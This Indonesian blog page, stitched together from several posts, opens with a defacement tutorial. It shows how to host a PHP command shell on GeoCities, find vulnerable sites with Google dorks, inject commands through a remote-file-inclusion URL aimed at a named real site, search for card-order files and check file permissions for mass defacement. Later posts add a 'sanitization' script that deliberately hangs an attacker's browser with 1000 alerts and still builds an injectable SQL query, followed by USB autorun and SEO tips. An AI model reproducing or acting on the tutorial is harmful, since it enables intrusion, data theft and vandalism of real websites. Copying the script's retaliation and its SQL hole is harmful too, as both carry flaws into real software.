<br>
<hr>
<br>
<font face="Verdana" size="1">
<b># m_beben from #kartubeben @ Dalnet</b><br>
<b># www.kartubeben.com | www.kartubeben.org | www.kartubeben.net</b>
<br><b># Come and join with us on #kartubeben @ Dalnet</b>
</font>

Hmm... mungkin ada yang tanya, maksud saya sebenarnya apa seh dan gimana cara masukin code ini ke site kite-kita pada ??? Gini lho maksud saya :( ini kita balik ke dasar lagi yah )
1. karena saya rekomendasikan hosting geocities, maka sekarang kalian semua buka web geocities di www.geocities.com
2. trus kalo kalian udah ada account di sana ya silahkan login ke sana, tapi kalo ente belom ada account, ada baiknya ente daftar dulu untuk buat account hosting di sana
3. seep... kita udah buat satu account
4. lalu kita login ke account pukisek kita itu di www.geocities.com
5. udah selesai login ke sana silahkan buka file manager ente di sana trus buatlah new file lalu isikan dengan code kita tadi. Ato kalo kalian gak mau repot-repot, pertama-tama copy-paste code yang saya kasih tadi ke pc kalian trus save dengan nama terserah kalian dengan ektensi .txt atau .jpg
lalu silahkan upload file yang udah kalian save di pc ente ke hosting dengan account yang udah kita buat tadi
6. di hosting, kalian bisa save code kita tadi dengan nama cmd.txt ato cmd.jpg
Seep... sekarang code tadi udah kita simpan di hosting kita, jadi kita bisa ngakses tuh code entar di www.geocities.com/accountkalian/cmd.txt ato
www.geocities.com/accountkalian/cmd.jpg.
Nah, sekarang masalah berikutnya adalah mencari target ☺. Bicara soal target adalah berbicara soal keberuntungan, wekekeke... saya aja kalo cari yang namanya target itu susah mati lho Cape banget... nyebelelin, bikin kesel,dll...
Nah, sekarang untuk masalah targetnya, kita bisa cari di google.com ☺ dengan keyword

allinurl: “index.php?*=*.htm*” ato allinurl: “index.php?*=*.php”
bisa juga
allinurl: “main.php?*=*.htm*” ato allinurl: “main.php?*=*.php”

terserah kalianlah mo pake apa keywordnya ☺☺☺
Okeh, misalnya kita udah dapat target di www.yugiohlegends. com/main.php?page=beben.txt nah, ini target kita inject, caranya masukin code inject php kita di target dengan cara

www.yugiohlegends.com/main.php?page=http://www.geocities.com/pukisek/cmd.jpg?&cmd=<di sini dimasukin perintah unix command>

jadi, di tempat unix command itu bisa masukin command unix apa aja, misalnya perintah locate orders.txt ato
locate orders.log :P~ tapi penulis lebih sering cari file httpd.conf dari pada orders.txt atau orders.log, soalnya saya bukan CARDER !!! :)
Okeh, kita gak bahas tentang saya ini seorang carder apa bukan, yang penting kalian semua bisa tentang masalah bug php ini.
Hm... tetapi inti sebenarnya yang saya mau bahas adalah bagaimana mendeface web dengan memanfaatkan perpaduan antara bug php ini sendiri dan permisi dari file-file di target kita. Siapa sangka jika seandainya  target yang enta ato penulis dapetin gak bisa untuk deface tetapi web yang berada satu hosting dengan target kita ternyata bisa di deface ☺.
www.udoka.com , www.theunderline.com yang ampe sekarang masih dalam keadaan terdeface ternyata saya deface dari target yang memiliki bug php yang laen sedang target itu sendiri belom kedeface. Makanya, jangan aneh kalo ada web yang saya deface padahal isinya hanya file-file statis, bukan dynamic
file seperti .php ato .asp namun tetap aja kedeface ☺☺☺

Bahkan kalo kalian pernah melihat site www.interaktif-online.com (udah mati) yang sempat beberapa kali kedeface ternyata di deface bukan dari site itu langsung, tetapi melalui hostingnya dulu, yaitu www.malang.indo.net.id
Nah, makanya jangan keburu nyesel dulu kalo liat ada target kita yang gak bisa dideface (dengan asumsi kita malas ngeroot di target tersebut macam penulis ☺).
Pertama-tama untuk melihat sebuah permisi file apakah sebanding dengan user id yang kita jalankan, maka gunakan command id lalu ls –la namun jangan keburu sedih dulu kalo ternyata user yang kita pake adalah nobody dan user yang nulis file di target adalah bebenkeren misalnya.
Hmm... lalu kita perhatikan permisi file di target kita, apakah ada yang bisa kita tulisi ? Biasanya karena kita nobody, file yang bisa ditulisi nobody adalah file yang allow write permission di bagian othernya.

$ls –l
total 1023
drwxrwxrwx 100 bebenkeren kartubeben 43203 kartubeben
drwx---rw- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt

Jika kita perhatikan contoh hasil command ls -l di atas, maka user yang menulis di target adalah bebenkeren dengan group kartubeben sedangkan id yang kita jalankan adalah nobody, maka file yang dapat kita tulisi ato kita deface adalah folder kartubeben dan deface karena kedua file tersebut memiliki permisi yang dapat ditulisi oleh other. Jadi misalnya nama domain target kita adalah www.contoh.com maka kita bisa mempublikasikan hasil deface kita di www.contoh.com/kartubeben ato di www.contoh.com/deface.
Trus gimana kalo target kita ketika kita cek ternyata hasilnya adalah seperti berikut :

$ls –l
total 1023
drwxr-xr-x 555 root root 50000 .
drwxrwxrwx 100 apache apache 40000 ..
drwxrwxr-x 100 bebenkeren kartubeben 43203 kartubeben
drwx---r-- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt
$pwd
/home/kartubeben/

Hmm... jika kita melihat sepintas maka tak ada file yang bisa kita tulisi sehingga kita tidak dapat mendeface target tersebut, tetapi tunggu dulu !!!. Coba kita perhatikan dengan seksama ternyata directory .. ato directory
sebelumnya/dibelakangnya ternyata memiliki permisi yang dapat ditulisi oleh account nobody sebagai other, dan wow !!! jika kita mendapati target yang demikian kita bisa melalukan mass defacing !!! ☺☺☺

Related Posts:

Percantik Tampilan USB Flashdisk

Kali ini sy mao berbagi trik untuk teman2... trik kli ini ialah mempercantik tmplan pada ufd kt. ini tulisan wa yg pertama... so kalo masi kaku2 gt di maklumin aja yaahh ;) lgsng saja pertama buka notepad dan masukkan script berikut :


[ExtShellFolder]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=desktop.jpg
IconArea_Text=0×0000FF
[.ShellClassInfo]
ConfirmFileOp=0

Tulisan desktop yang dicetak tebal adalah nama gambar..jadi kamu bisa mengganti gambar apapun dan kapanpun tinggal ganti nama picturenya aja... simpan kode script yang tadi anda copy kedalam flashdisk yang sudah disiapkan tadi..dengan nama dan extensi "desktop.ini"
Jangan lupa gambar harus berada pada halaman depannya ( tidak didalam folder )
Setelah itu.. kita akan mengubah icon pd ufd yg masi std. buka lg dong notepad.exe, ketik script :

-----[start]-----
[autorun]
icon=icon.ico
-----[end]-----

save as autorun.inf in ur ufd.
abis itu  ... cari file yg *.ico
ingat harus berekstensi ico ya. and then it rename with icon. stlh fd di replug... jadi dehhh ;)
Cara diatas bisa dipake buat device lainnya.

Related Posts:

Script Sanitasi Input ( Attack )

- Pengantar
HTML injection, script injection atau apapun istilahnya dari teknik hacking
klasik dengan metode memasukkan kode-kode HTML maupun JavaScript
kedalam field input suatu web based application memiliki potensi merusak yang
cukup besar apabila tidak ditangani dengan baik...bagi programmer pemula
yang tidak banyak mengetahui fungsi-fungsi yang ada tentu akan menjadi
masalah yang cukup menyusahkan. Disini saya mengambil contoh penggunaan
dengan PHP programming, banyak disediakan fungsi-fungsi untuk mengatasi
hal tersebut...misalnya :
* strip_tags, mysql_escape_string, htmlentities dll
* menerapkan aturan regular expresion -> preg_match, ereg, ereg_replace

- Potensi Kerusakan
Kerusakan yang dapat terjadi sangatlah berbahaya apabila seorang penyerang
mengetahui kelemahan dari sanitasi input pada aplikasi web kita, misalnya
dengan memasukkan kode-kode HTML dan JavaScript seorang penyerang dapat
merubah tampilan dari aplikasi kita ataupun mendirect halaman dari aplikasi
kita ke alamat penyerang dan berbagai macam bentuk potensi merusak lainnya.

-Kelemahan selain HTML injection
Permasalahan lainnya dari sanitasi input adalah penanganan terhadap input dari
user berupa karakter tanpa spasi, dengan memasukkan karakter tanpa spasi
dalam jumlah yang besar akan menyebabkan rusaknya tampilan aplikasi web
kita...tentu hal ini sangat menyebalkan dan kita tidak menginginkan itu terjadi
bukan?? :) dan terkadang saya juga ingin sedikit membalas tindakan mereka ;)
Setelah kita melakukan sanitasi terhadap kode-kode html maka diperlukan juga
sanitasi terhadap input karakter tanpa spasi yang dapat merusak tampilan
12
website kita, sekaligus untuk sedikit memberi pelajaran pada siiseng..
kita buat browser dia untuk looping sebanyak2nya...

- POC (Proof Of Concept)
Disini kita akan membuat sebuah fungsi yang akan digunakan untuk mensanitasi
string yang dimasukkan oleh user, apabila string tidak
bermasalah/mengandung kode-kode dan maksud yang tidak baik maka data
akan diinput kedalam database aplikasi kita sedangkan jika sebaliknya maka
fungsi ini akan memfilternya dan mem-bypass ke sebuah script yang akan
diterima oleh user yang mengirimkan kode tersebut :)
Langkah-langkahnya adalah sebagai berikut -->>
1. buat file untuk fungsi mengecek komentar/teks input

cekKomen.php
# 1 <?php
# 2
# 3 function komentar($komentar)
# 4 {
# 5 if(!empty($komentar))
# 6 {
# 7 $bersihKomentar = preg_match("/^[a-z0-9. .,.:.-]+$/i", $komentar); // mengijinkan alphanumerik
# 8 $ok = explode(" ",$komentar);
# 9 $jml = count($ok);
# 10 for($i=0;$i<$jml;$i++)
# 11 {
# 12 $hal[$i] = strlen($ok[$i]);
# 13 }
# 14 for($i=0;$i<$jml;$i++)
# 15 {
# 16 if (($hal[$i] > 20) || (!$bersihKomentar)) // asumsi jumlah karakter dari setiap kata > 20 (bisa dirubah)
# 17 {
# 18 $keluar = false;
# 19 break;
# 20 }
# 21 else
# 22 $keluar=true;
# 23 }
# 24 if($keluar==true)
# 25 return $komentar;
# 26 }
# 27 else
# 28 return $komentar;
# 29 if ($keluar==false)
# 30 {
# 31 ?>
# 32 <script>
# 33 var bilangan=1;
# 34 do{
# 35 alert("Kenapa...! Mo coba HAcking Yah...BRoWseR ANda HanG SekAraNG");
# 36 bilangan ++;}
# 37 while(bilangan<=1000);
# 38 </script>
# 39 <?
# 40 }
# 41 }
# 42 ?>
--------------------------------------------eof---------------------------------------

- Penjelasan Script
Baris 3 menyatakan kita membuat sebuah fungsi untuk melakukan sanitasi dari
variabel komentar.
Baris 5 membuat suatu kondisi apabila user telah melakukan input data
Baris 7 melakukan sanitasi terhadap string dengan hanya mengijinkan karakter
alphanumerik
Baris 8 memecah karakter input berdasarkan spasi
Baris 9 menghitung jumlah kata pada data input utnuk dijadikan parameter
dalam melakukan penelusuran
Baris 12 - 22 menghitung jumlah huruf pada setiap kata dan apabila ditemukan
jumlah huruf > 20 atau ditemukan karakter yang tidak diijinkan maka akan
menciptakan kondisi false, sebaliknya akan menciptakan kondisi true.
Baris 24 - 25 Jika kondisi true maka data yang akan dimasukkan oleh user akan
dimasukkan kedalam database apa adanya.
Baris 27 - 38 Jika kondisi false maka fungsi akan mem-bypass input dari user dan
mengeksekusi sebuah script yang akan dikirimkan kekomputer klien/user
penyerang. Dalam contoh ini saya membuat pada komputer user akan muncul
kotak peringatan yang harus diklik 1000 x, dan ini akan membuat browser user
tidak berjalan semestinya/hang

- Implementasi
2. Sertakan file dan fungsi tersebut pada script input kita....
# 1 <?php
# 2 include "connect.php";
# 3 include "cekKomen.php";
# 4
# 5 if(!$submit) {
# 6 ?>
# 7 <form name="form1" method="post" action="">
# 8 <table width="200" border="1">
# 9 <tr>
# 10 <td>Nama</td>
# 11 <td><input name="nama" type="text" id="nama"></td>
# 12 </tr>
# 13 <tr>
# 14 <td>Jabatan</td>
# 15 <td><input name="jabatan" type="text" id="jabatan"></td>
# 16 </tr>
# 17 <tr>
# 18 <tr>
# 19 <td>Komentar</td>
# 20 <td><textarea name="komentar" id="komentar"></textarea></td>
# 21 </tr>
# 22 <td colspan="2"><input name="submit" type="submit" id="submit" value="Submit"></td>
# 23 </tr>
# 24 </table>
# 25 </form>
# 26
# 27 <?php
# 28 } else {
# 29 connect();
# 30 $periksaNama = strip_tags($nama);
# 31 $periksaJabatan = strip_tags($jabatan);
# 32 $periksaKomentar=komentar($komentar); // menyertakan fungsi sanitasi komentar
# 33 $query=mysql_db_query($db, "insert into user (nama, jabatan, komentar) values
# 34 ('$periksaNama', '$periksaJabatan','$periksaKomentar')");
# 35 if($query){
# 36 echo "Data Berhasil diinput";
# 37 }else{ echo "Data Gagal diinput"; }
# 38 }
# 39 ?>
--------------------------------------------------eof-------------------------------------------

Baris 5 - 25 menampilkan form input dengan variabel-variabel tertentu apabila
form dalam kondisi tidak terkirim
Baris 29 - 34 melakukan sanitasi terhadap karakter yang diinput dan
memasukkannya kedatabase apabila bersih dari kode maupun input yang tidak
baik berdasarkan fungsi yang disertakan.

- Penutup
Artikel ini saya buat sebagai pembelajaran bagi para programmer pemula (termasuk saya) dalam melakukan sanitasi input, serta memberi pelajaran bagi user yang bermaksud tidak baik :)
Saya sengaja memasukkan unsur-unsur fungsi sanitasi sebagai contoh implementasi... serta saya tidak membuat sebuah kode/script yang dapat merusak balik penyerang aplikasi kita, walaupun itu bisa saja dilakukan dengan memasukkan kode-kode exploit maupun virus. Ingat kita bukanlah cracker yang
melakukan perusakan. Algoritma ini dapat diterapkan pada semua jenis scripting programming, tidak
hanya sebatas pada PHP...

- Referensi
1. Web Hacking: Serangan dan pertahanannya - Stuart McClure
2. Writing Security Tools and Exploits - James C. Foster ; Vincent Liu
3. Hackers Handbook - Auzy_build011
4. Professional PHP Programming - Jesus Castagnetto ; Harish Rawat dkk
4. www.forum.mercubuana.it.org
5. Ezine from Echo.or.id

Related Posts:

Cara mendatangkan banyak pembaca

Bersikap sabar
Mendatangkan banyak pembaca itu perlu waktu, jadi kita perlu bersabar tidaklah mungkin blog yang baru dibuat seminggu didatangi ribuan pengunjung. Jadi bersabar dan tidak usah terburu buru.

Konten berkualitas dan desain yang menarik.
Saat ini ada sekitar juataan blog yang wara wiri didunia maya yang menjadi pesaing kalian. Jadi berilah pembaca sesuatu yang unik dan bermanfaat untuk dibaca. Konten yang unik dan menarik perhatian biasanya dapat mendatangkan banyak pengunjung.

Buat link keblog lain
Selain membuat konten original, melink blog lain juga akan menjadi sarana menarik perhatian blogger lain. Jangan membuat link kesemua blog, tetapi pilihlah blog yang memiliki konten yang benar benar bagus. Jika kalian secara teratur membaca sejumlah blog sebaiknya kalian membuat blogroll dan menaruh link dari blog lain yang bisa dibaca.

Membuat komentar diblog lain
Upayakan agar kalian merupakan komentator yang pertama di blog itu. Ini bisa terjadi apabila kalian proaktif, atau beruntung. Jika memungkinkan, berikan komentar berupa pertanyaan, tentu saja pertanyaan yang berkaitan dengan topik yang dibahas.

Update secara teratur
Jika melakukan update secara teratur, pembaca akan datang secara teratur. Juga akan membuat bot mesin pencari mendatangi bog secara teratur dan lebih sering.

Manfaatkan mesin pencari
Semakin lama blog kalian aktif dan semakin banyak postingan yang dibuat maka semakin besar kemungkinan mesin pencari mendatangkan banyak pengunjung.

Daftar ke blog search engine
Daftarkan blog kalian ke situs seperti Technorati. Situs seperti ini memiliki fitur yang memungkinkan orang melakukan pencarian melalui topik dankata kunci.

Jadi diri sendiri
Ada jutaan tips dan trik seputar cara mendatangkan pembaca, seperti yang telah saya utarakan diatas. Namun yang perlu diingat adalah tidak ada hukum baku dalam dunia blogging. Semua tips dan trik umumnya berasal dari pengalaman. Jadi sebaiknya jadilah diri sendiri, dan jangan ragu melakukan berbagai eksperimen terutama cara menulis dan dan metode penulisan.

Related Posts:

Tips menarik banyak komentar

Aktif berkomentar di blog lain
Sebagian besar blogger  terutama di indonesia mempunyai kebiasaan unik, yaitu mereka hanya mau berkomentar ke blog lain kalau ada pihak lain yang berkomentar terlebih dahului ke blognya. Hukum memberi dan menerima berlaku disni. Jadi hal yang bisa kita lakukan disini adalah mencoba berkomentar diblog lain, berikan komentar yang sesuai dengan isi postingannya, jangan hanya sekedar kata kata makasih infonya, apalagi menggunakan kalimat pertamax ( yang artinya dia yang pertama berkomentar ).

Permudah cara berkomentar
Kadang kala, untuk mengantisipasi kemungkinan munculnya komentar spam, para blogger membuat jaring pengaman pada kotak komentarnya, seperti mengaktifkan fitur moderasi, password  ataupun capcha. Ini sah-sah saja, namun jika anda ingin mendapatkan lebih banyak komentar, sebaiknya kalian benar-benar mempermudah cara berkomentar. Berdasarkan pengalaman jika si pemberi komentar gagal berkomentar di kotak komentar kalian maka dia enggan melakukannya untuk yang kedua kalinya.

Usahakan selalu membalas komentar
Karena pembaca adalah tamu yang berkunjung, jadilah tuan rumah yang baik. Jadi usahakan selalu membalas sapaan atau komentar yang dibuatnya.

Tulis tema yang “merangsang”
Pilih tema yang merangsang dan memancing rasa ingin tau dan dipostingan diatur sedemikian rupa sehingga kesimpulan mengambang atau menggantung. Hai ini tentu akan menarik pengunjung yang membaca berkomentar.

Beri bonus
Bonus tidak perlu berupa uang yang saya maksud disini adalah setiap pengunjung yang berkomentar akan mendapatkan imbalan berupa link gratis dengan cara menjadikan blog Dofollow. Untuk membuat blog menjadi dofollow baca disini.

Related Posts:

Keyword untuk SEO

Dimana tempat terbaik untuk menaruh keywords untuk SEO
Apabila kita sudah mendapatkan keywords yang kita rasa bagus, kita perlu tahu di mana harus menempatkan kata kunci tersebut di situs Web kalian.

Related Posts:

10 Teknik Dasar SEO

Search Engine Optimization atau yang lebih dikenal dengan dengan istilah SEO adalah cara seseorang untuk meningkatkan traffic ataupun Page rank Website atau blog mereka dimesin pencari. Teknik SEO digunakan agar website atau blog kita menempati perinkat 1,2 atau 3 pada mesin pencari. Sebagai contoh kalian yang sedang melakukan searching di mesin pencari anggap saja google.com, jika sudah tidak menemukan apa yang kalian cari pada halaman pertama sudah pasti kalian akan males membuka halaman yang kedua atau pun seterusnya bukan. Nah, SEO digunakan untuk menempati posisi blog atau website kita dihalaman terdepan dari google dan kawan-kawannya.

Related Posts:

Cara Membuat Folder Rahasia

Kalian mungkin tidak ingin data-data penting bahkan yang bersifat privasi kalian dilahat oleh orang lain yang sedang menggunakan komputer ataupun laptop kalian bukan.
ngak perlu pake software yang aneh-aneh deh, tinggal buat aja sendiri programnya, gampang kok. ikuti aja langkah-langkahnya.

Related Posts: